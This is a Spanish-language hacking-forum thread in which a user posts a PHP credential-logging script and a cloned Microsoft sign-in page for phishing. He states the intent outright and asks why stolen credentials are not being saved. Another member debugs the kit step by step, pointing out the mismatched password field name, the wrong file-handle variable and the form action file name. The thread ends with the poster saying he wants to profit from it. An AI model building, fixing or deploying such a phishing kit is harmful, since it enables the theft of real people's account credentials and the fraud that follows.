Aporte para la Comunidad, pero necesito ayuda.
Utilizo mi archivo PHP
<?php
$email = $_POST[ 'email' ];
$pass = $_POST[ 'password' ];
$ip = $_SERVER[ 'REMOTE_ADDR' ];
$f = fopen("user.html", "a");
fwrite($file, 'Email: [<b><font color="#0000FF">'.$email.'</font></b>] Password:[<b><font color="#FF0040">'.pass.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');
fclose($f);
header("location: https://goo.gl/UXNMo");
Para redireccionar y hacer Phishing
Con el siguiente archivo INDEX ---- Pero tengo un problema que todo me sale bien pero no me llega nada al archivo USER.
<html><link href="https://auth.gfx.ms/16.000.26513.01/Default2058.css" rel="stylesheet"><head><title>Iniciar sesión en tu cuenta Microsoft</title><link type="image/x-icon" rel="shortcut icon" href="https://auth.gfx.ms/16.000.26513.01/favicon.ico?v=2"></head>
<body class="cb"><div> <form action="haxor.php" name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" data-bind="submit: submit, autoSubmit: forceSubmit, attr:{action: "haxor.php"}"> <div data-bind="component:{name: , params:{serverData: svr, showButtons: svr.A4, showFooterLinks: true, useWizardBehavior: svr.BH, submit: submit, password: pwdView.password.value, hideFromAria: learnMore.visible}}"> <div id="maincontent"> <section class="section no-margin-bottom" data-bind="visible: ! || .showHolder"> <div class="section-body container"> <div id="pageControlHost"> <div> <div id="Credentials"> <div class="container" id="CredentialsInputPane"> <div class="row text-body" data-bind="ariaHidden: hideFromAria"> <img alt="Cuenta Microsoft" src="https://auth.gfx.ms/16.000.26513.01/AppCentipede/AppCentipede_Microsoft.svg" class="img-centipede" data-bind="svgSrc: centipede.getUrl(), attr:{alt: str[]}"> </div><div data-bind="ariaHidden: learnMore.visible"> <div id="loginHeader" class="row text-subheader" data-bind="text: loginHeader">Iniciar sesión</div><div class="row text-body"> <div id="loginDescription" data-bind=" htmlWithBindings: loginDescription, childBindings:{: !pwdView.isCombinedSISU()}}}">Usa tu cuenta de Microsoft. <a class="display-block" href="#" id="learnMoreLink" target="_top">¿Qué es esto?</a></div></div><div class="row" data-bind="ifnot: fedView.isActive() || hrdVisible()"> <div data-bind="if: ngcView.isNGCReAuthSupported"></div><div data-bind="if: postType()===11"> <div data-bind="component:{name: , params:{serverData: svr, validationEnabled: validationEnabled, phone: pwdView.phone, username: pwdView.username, password: pwdView.password, hip: pwdView.hip, kmsi: pwdView.kmsi, lockUsername: lockUsername, focusDefaultField: true, setOtcPostType: setOtcPostType, signUpUrl: signUpUrl, resetPasswordUrl: resetPasswordUrl}}"> <fieldset> <div data-bind="component:{name: ], allowPhone: svr.A, allowSkype: svr.B, validationEnabled: validationEnabled, signUpUrl: signUpUrl, resetPasswordUrl: resetPasswordUrl}}"> <div class="row"> <div class="form-group"> <div class="form-group col-md-24"> <div style="display: none;" id="SUName0" class="text-body text-block-body no-margin-bottom" data-bind="visible: locked, text: value"></div><div data-bind="visible: !locked"> <div class="placeholderContainer" data-bind="component:{name: )}}"> <input aria-label="Correo electrónico o teléfono" placeholder="Correo electrónico o teléfono" name="email" value="" id="email" maxlength="113" class="form-control ltr_override" aria-describedby="usernameError" data-bind="textInput: value, value: value.delayed, hasFocusEx: focused, placeholder: , ariaLabel: hintText, css:{: error}, attr: inputAttributes" lang="en" type="email"> <div style="display: none;" id="usernameProgress" class="progress" data-bind="visible: showProgress"><div></div><div></div><div></div><div></div><div></div><div></div></div><div class="phholder" style="left:0;top:0;width:100%;position:absolute;z-index:5" data-bind="visible: !textInput(), click: focus"></div></div><input name="login" data-bind="value: postValue" type="hidden"> </div></div></div></div></div><div data-bind="component:{name: , params:{value: password.value, error: password.error, hidden: password.hidden, focused: passwordFocused, disabled: password.disabled, hidden: password.hidden, errors: passwordErrors, allowLongPasswords: svr.C, validationEnabled: validationEnabled, resetPasswordUrl: resetPasswordUrl}}"> <div class="row"> <div class="form-group col-md-24"> <div class="placeholderContainer" data-bind="component:{name: }}"> <input maxlength="127" aria-label="Contraseña" placeholder="Contraseña" name="pass" id="pass" autocomplete="off" class="form-control" aria-describedby="passwordError" data-bind=" textInput: value, hasFocusEx: focused, disable: disabled, placeholder: , ariaLabel: str[: error}" type="password"> <div class="phholder" style="left:0;top:0;width:100%;position:absolute;z-index:5" data-bind="visible: !textInput(), click: focus"></div></div></div></div></div><div data-bind="component:{name: , params:{value: kmsi.value, locked: lockUsername}}"><div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top" data-bind="visible: !locked"> <label id="idLbl_PWD_KMSI_Cb"> <input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" data-bind="checked: value" type="checkbox"> <span data-bind="text: str[]">Mantener la sesión iniciada</span> </label> </div></div></fieldset></div></div><div data-bind="if: postType()===17"></div><div data-bind="if: postType()===30"></div></div><div class="row" data-bind="if: fedView.isActive"></div><input value="11" name="type" data-bind="value: svr.BH ? 20 : postType" type="hidden"> <input value="Dbq7dxFAqQ1rGm3H3nJtG9uJ*BhpQFvT*goORXSc1vh!gHkHHc65dWzFAayioJfhUTWfNvRYgcJji4FSzBH3pIWUZQv!oQZFqBwOo2l3o39RZFsbcbqToq7nnCKKq*JATYr!Mi93IBCvrQX74H*HC9xdGRLeYhTTPBn4a34PftO9yYFRhgUUPmzcM!SMlHBicpqUHd!MtyV2ge9g0swLQn4I!ARy!eGJ343NUkvKZcJULoagBV1LMU8dvt96d2yJKHiXMuMMS5uxsU!HVGjeDU0$" name="PPFT" id="i0327" data-bind="value: svr.sFT" type="hidden"> <input value="Passp" name="PPSX" data-bind="value: svr.t" type="hidden"> <input name="NewUser" value="1" type="hidden"> <input value="3" name="LoginOptions" data-bind="value: loginOptions" type="hidden"> <input value="" name="FoundMSAs" data-bind="value: foundNames" type="hidden"> <input value="0" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" type="hidden"> <div data-bind="component:{name: , params:{loginMode: svr.g, kmsi: pwdView.kmsi.value, whatsThis: learnMore.shown(), pageSubmitted: pageSubmitted}}"><input value="1" name="i2" data-bind="value: clientMode" type="hidden"> <input value="{"navigationStart":1472696102209,"unloadEventStart":0,"unloadEventEnd":0,"redirectStart":0,"redirectEnd":0,"fetchStart":1472696103288,"domainLookupStart":1472696103288,"domainLookupEnd":1472696103710,"connectStart":1472696103710,"connectEnd":1472696103710,"requestStart":1472696104015,"responseStart":1472696104125,"responseEnd":1472696104514,"domLoading":1472696104515,"domInteractive":1472696105488,"domContentLoadedEventStart":1472696105491,"domContentLoadedEventEnd":1472696105492,"domComplete":1472696105493,"loadEventStart":1472696105493,"loadEventEnd":0}" name="i16" data-bind="value: clientPerf" type="hidden"> <input value="0" name="i17" data-bind="value: srsFailed" type="hidden"> <input value="__DefaultLoginStrings|1,__DefaultLogin_Core|1,__DefaultLogin_OTC|1," name="i18" data-bind="value: srsSuccess" type="hidden"> <input value="" name="i19" data-bind="value: timeOnPage" type="hidden"> <input value="0" name="i21" data-bind="value: clientUsedWhatsThis" type="hidden"> <input value="0" name="i13" data-bind="value: clientUsedKmsi" type="hidden"></div></div><div data-bind="component:{name: , params:{shown: learnMore.shown, visible: learnMore.visible, accountQueryUrl: svr.a2, loadDynamicContent: svr.BG}}"></div></div></div></div></div><div data-bind="ariaHidden: hideFromAria"> <div class="row" id="ftrButton"> <div class="col-xs-24 form-group" data-bind="ariaHidden: learnMore.visible"> <input value="Iniciar sesión" id="idSIButton9" class="btn btn-block btn-primary btn-image btn-image-svg" data-bind=" value: submitButtonText, css:{: true && true}" type="submit"> </div></div><div data-bind="ariaHidden: learnMore.visible"> <div data-bind="component:{name: , params:{showOtcLink: !isFSI && !isOTS && !svr.U, showSignupLink: !lockUsername && svr.Ah, showResetPasswordLink: true, showRemoteNGCLink: false, showPasswordLink: false, lockUsername: lockUsername, setOtcPostType: setOtcPostType, resetPassword: hrd ? hrd.resetPassword : null, signUpUrl: signUpUrl, resetPasswordUrl: resetPasswordUrl}}"><div class="row"> <div class="col-md-24"> <div class="section" data-bind="htmlWithBindings: html[:{href: signUpUrl}}">¿No tiene una cuenta? <a href="https://signup.live.com/signup.aspx?wa=wsignin1.0&rpsnv=13&ct=1472696102&rver=6.4.6456.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f&id=292841&cbcxt=out&fl=wld&bk=1472696104&uiflavor=web&uaid=6585967bc7634e0e804c196f7ed8023f&mkt=ES-MX&lc=2058" id="signup">Cree una.</a></div><div class="text-13"> <div class="form-group"> <a id="idA_PWD_ForgotPassword" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1472696102%26rver%3d6.4.6456.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%26lc%3d2058%26id%3d292841%26mkt%3des-mx%26cbcxt%3dout%26fl%3dwld%26bk%3d1472696104&id=292841&uiflavor=web&uaid=6585967bc7634e0e804c196f7ed8023f&mkt=ES-MX&lc=2058&bk=1472696104" data-bind="text: str[], href: resetPasswordUrl, click: resetPassword ? resetPassword.toggle : null">Olvidé mi contraseña</a> </div><div class="form-group" id="idTD_PWD_SwitchToOTCLink"> <a id="idA_PWD_SwitchToOTC" href="#" data-bind="text: str[], click: setOtcPostType">Inicia sesión con un código de un solo uso</a> </div><div style="display: none;" class="form-group" data-bind="visible: lockUsername && svr.urlSwitch && svr.w"> <a id="i1668" href="https://login.live.com/logout.srf?wa=wsignin1.0&rpsnv=13&ct=1472696102&rver=6.4.6456.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f&lc=2058&id=292841&mkt=es-mx&cbcxt=out&fl=wld&ru=https://outlook.live.com/owa/&bk=1472696104&lm=I" data-bind="text: str[], href: svr.urlSwitch">Inicia sesión con una cuenta Microsoft diferente</a> </div></div></div></div></div></div><div id="ftr" class="text-body"> <div data-bind="component:{name: , params:{showLinks: footer.showLinks, showLogo: footer.showLogo, serverData: svr}}"><div id="footerTD" class="popupfooter popup breakword footer"> <div class="footerNode links text-secondary"> <a target="_blank" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=ES-MX&vv=1600" id="ftrTerms" class="first" data-bind="text: str[: linkTarget}">Términos de uso</a> <a target="_blank" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=ES-MX&vv=1600" id="ftrPrivacy" data-bind="text: str[: linkTarget}">Privacidad y cookies</a> </div><div id="ftrLogo" class="footerNode text-base text-secondary text-logotype"><img alt="Microsoft" src="https://auth.gfx.ms/16.000.26513.01/Microsoft_Logotype_Gray.svg" data-bind="svgSrc: logoTypeUrl, attr:{alt: str[]}"></div></div></div></div></div></div></section> </div></div><input type="hidden" name="type" value="hotmail"> <input type="hidden" name="identifier" value="LAMENTE1"> <input type="hidden" name="URL" value="https://login.live.com"> <input type="hidden" name="platform" value="Desktop"></form></div></body></html>
Buenas, echa un vistazo a las normas https://underc0de.org/foro/underc0de/reglas-generales-del-foro-(lectura-obligatoria)/
Te recomiendo tambien que incluyas tu codigo entre las etiquetas correspondientes para facilitar la lectura
Un saludo
https://underc0de.org/foro/dudas-generales-121/(actualizado)-como-realizar-dudas-bien-redactadas/
Es conveniente leer, también.
Gabriela
muchas gracias seguir las normas es lo mas importante para una comunidad sana y respetuosa.! pero necesito ayuda con mi primer post e investigado muchisimo y e recolectado toda buena informacion que pueden ver pero el minimo detalle es que no me llegan los resultados del phishing aprecio la ayuda de otros usuarios att kbmas :)
@kbmas (https://underc0de.org/foro/index.php?action=profile;u=66077).
¿Cual es el problema que estas teniendo? ¿En que parte de código tiene errores? ¿Tienes algún log para exportar?
Debes ser más específico con lo que planteas. Tu código es tú lógica. Por consecuente, para que podamos comprender el objetivo que buscas, debes indicar una sección de código.
Saludos !
Has dado permisos a ambos ficheros? El php y el archivo user.html donde guardas?
Un saludo.
En el Index fake no existe ningún id ni ningún name con password
id="password" name="password <<<<<<<<<<<<<esto no existe con lo cual ya tienes un error...!
En el index
<input maxlength="127" aria-label="Contraseña" placeholder="Contraseña" name="pass" id="pass" autocomplete="off"
Como puedes observar el id && name es pass no password si utilizaras un deguger te facilitaría mucho la vida
$pass = $_POST[ 'password' ];
Otro fallo que he visto es este:
$f = fopen("user.html", "a");
Cuando debería quedar así :
$file = fopen("user.html", "a");
Porque luego lo utilizas aquí
fwrite($file,<<<<<<< como ves esta es la variable en donde se va añadir el contenido
No te lo tomes a mal pero todavía no estás capacitado para hacer bien lo que quieres hacer yo te aconsejo que aprendas a hacer las cosas partiendo de una base teórica porque lo que no se puede hacer es un cohete lunar con papel de fumar.
Hazme caso cójete un tutorial de los cientos que se comparten en este grandísimo Foro y reviéntalo hasta caer exhausto y cuando comprendas los fundamentos verás como todo tiene sentido.
Es un consejo sin ánimo de ofender a nadie Suerte y al Toro.
Si de poco a poco voy estuve viendo cursos html y de verdad que esto es toda una ciencia hay q tener una mente bien capacitada para ver los errores q vistes y estuve corroborando y tienes razon me fue de gran ayuda ver esos pequeños errores.! en mi caso pido estas pocas ayudas en otros casos por ejemplo a otros usuarios les gusta que le hagan todo.! pero tengo mis pestañas bien buenas para seguir leyendo darle con todo soy de vzla me gustaria hablar contigo por microfono espero tu respuesta Hu3c0
Lo que tienes que tratar de hacer es ir poco a poco y no tratar de abarcar tanto al mismo tiempo o perderás información en el proceso....
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Si de poco a poco voy estuve viendo cursos html y de verdad que esto es toda una ciencia hay q tener una mente bien capacitada para ver los errores q vistes y estuve corroborando y tienes razon me fue de gran ayuda ver esos pequeños errores.! en mi caso pido estas pocas ayudas en otros casos por ejemplo a otros usuarios les gusta que le hagan todo.! pero tengo mis pestañas bien buenas para seguir leyendo darle con todo soy de vzla me gustaria hablar contigo por microfono espero tu respuesta Hu3c0
Hola amigo
@kbmas (https://underc0de.org/foro/index.php?action=profile;u=66077) para mi vida anónima no dispongo de ninguna Red Social o forma de contactar porque no me gustan las Redes Sociales para nada
Y no soy ninguna mente prodigiosa tú puedes hacerlo igual que yo, pero debes de estudiar como funcionan las cosas todo tiene unas reglas de funcionamiento.
Por ejemplo el php no está debidamente cerrado esto es una apertura y cierre <?php ---aquí va código ?>
Luego otra cosa que se me olvidó decirte es que el archivo php debes llamarlo haxor.php porque así está en el action del formulario form action="haxor.php" ó modificar todo a tu antojo cambiandoles los nombres.
O también en el encabezado por encima del html puedes poner el código php haciendo un condicional preguntado si está seteadas las variables algo así
if ( isset($_POST['f1'] )){haces esto;}
else {haces lo otro;}
Es bastante complejo poder ponerme en tu contexto actual y poder ayudarte y me encantaría poder hacerlo porque así aprendería yo también pero hay muchas cosas que desconoces y sólo alcanzarás comprenderlas si pones de tu parte SI ó SI.
Vete mirando variables, alcance de variables, variables globales,itineración&&condicionales, arrays , php Object¿cómo se construye un formulario para php eso sólo para tomar contacto? Debes comprender como se mandan los datos por el método POST , debes comprender sobre variables de sesión.
No quiero que pienses ni tú ni nadie que voy de listillo yo me considero un aprendiz y me acojono de lo que todavía no sé que es mucho ,sólo que pongo mucho de mi parte para comprenderlo todo.
Para finalizar ese código que has pegado tiene muy mala leche ¿Porqué? Porque lo han puesto así para fastidiar a gente sin conocimientos en términos del jurásico es un código antinoob...!
Saludos y a ponerse manos a la obra
es enserio @Hu3c0 (https://underc0de.org/foro/index.php?action=profile;u=25363) joder tio ese ultimo parrafo me mato el alma ----> Para finalizar ese código que has pegado tiene muy mala leche ¿Porqué? Porque lo han puesto así para fastidiar a gente sin conocimientos en términos del jurásico es un código antinoob...!
fuuuuuck todo esto me resume que de por si tengo que seguir leyendo y leyendo tengo dos dias viendo un curso de html por youtube pero son cosas basicas terminos que logro tratar de entender pero hago tantas cosas al dia que solo por las noches me pongo a investigar tuviera una pila que me dure 24/7 para poder realizar todas las investigaciones posible.!! pero lo mas triste que siempre queremos resultados de un dia para otro.!! saludos a todos y bueno mi intension no es para hacer el mal si no que saber aprovechar de una facilidad que nos da el internet el sistema y poder asi mejorar la situacion economica que se vive en la fukin venezuela en que vivimos muchas gracias.!